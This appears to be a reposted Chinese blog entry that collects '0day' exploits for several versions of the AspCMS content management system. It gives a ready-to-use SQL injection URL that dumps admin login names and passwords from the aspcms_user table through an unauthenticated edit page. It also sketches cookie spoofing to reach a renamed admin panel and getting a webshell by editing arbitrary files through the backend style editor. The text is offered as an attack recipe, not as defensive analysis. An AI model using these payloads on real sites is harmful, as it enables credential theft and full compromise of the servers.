aspcms各版本漏洞0day集合
生活随笔
收集整理的這篇文章主要介紹了
aspcms各版本漏洞0day集合
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
admin/_content/_About/AspCms_AboutEdit.asp?id=19?and?1=2?union?select?1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24?from?aspcms_user?where?userid=1
————————————————————————
Powered by AspCms2.0
未驗證權限,且存在注入漏洞
admin/_content/_About/AspCms_AboutEdit.asp?id=19
表名:aspcms_user
列名:loginname、password
利用EXP:
2.0漏洞測試人:逍遙復仇(請注明)
——————Cookies欺騙——————
逍遙復仇碰到一個站后臺被管理員改了,NND。后臺主頁半天沒有找到,最后去官方down源碼查看是home.asp(版本不同如不對請試main.asp),工具為:Cookie & Inject Browser
——————webshell獲取——————
所有版本存在后臺編輯風格 可以修改任意文件,獲取webshell就很簡單了
轉載于:https://blog.51cto.com/0daysec/1571383
總結
以上是生活随笔為你收集整理的aspcms各版本漏洞0day集合的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 字符串分离函数
- 下一篇: POJ2299 逆序数